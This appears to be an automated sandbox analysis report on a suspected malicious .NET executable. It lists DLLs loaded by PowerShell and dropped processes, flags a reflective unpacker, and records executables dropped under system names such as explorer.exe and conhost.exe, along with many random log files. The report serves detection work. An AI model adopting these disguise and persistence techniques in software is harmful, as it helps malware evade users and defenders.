                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: mscoree.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: apphelp.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: version.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: wldp.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: profapi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: ktmw32.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: amsi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: userenv.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: dnsapi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: CPNSQusnwC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: CPNSQusnwC.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: CPNSQusnwC.exeStatic file information: File size 2670080 > 1048576
                    Source: CPNSQusnwC.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x28b600
                    Source: CPNSQusnwC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: CPNSQusnwC.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                    Source: CPNSQusnwC.exe, 857.cs.Net Code: _736
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343D3CB9 push ebx; retf 0_2_00007FFD343D3CBA
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343D00BD pushad ; iretd 0_2_00007FFD343D00C1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A8167 push ebx; ret 0_2_00007FFD345A816A
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A9E10 pushad ; ret 0_2_00007FFD345A9E11

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exeJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\UJAAAsrr.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\AxLDtRxd.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\DrOTkRbS.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\qVqwKxgw.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\DiqTAfIW.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\pxxplmMK.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\GWITZydS.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TmvagkQx.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\nTDOpObA.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\SVwsOfwt.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\CxYvgXXc.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\ufMwPuFo.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\hovXJzGK.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\FnPmnTXV.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\wdeWzfMx.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\uNFeAYLl.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\UPlQSaAj.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\FZhLDyOY.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\bvfQbQIf.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\HzZUtpuN.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\QwEjYoPD.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\aIOpvFFY.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ELylTcFa.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ySVMqwBm.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\liYyiBRH.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\bqhiOmsd.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\xQsMWHQg.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\fJbhCUkS.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\zJHvHEBf.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\gljzVSiX.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\eJSyBaRc.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\jWOPcftP.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\cSkqvYkZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\vEieQmso.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\UOyjNWIs.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TvSaQXjt.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\scaNtKAs.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\sUqvPban.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\dGozhlgX.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\SSKIxalp.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\uaPNCQpm.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\WJAzEWli.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\tQeVfYwq.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\GzLcGkVO.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\LmdbigkC.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ejwQzjeb.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\QhesqMaw.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\nDhGzpaM.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TkfSyAEq.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\FBkUkkGT.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\FBkUkkGT.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\DrOTkRbS.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\uNFeAYLl.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\dGozhlgX.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\SSKIxalp.logJump to dropped file
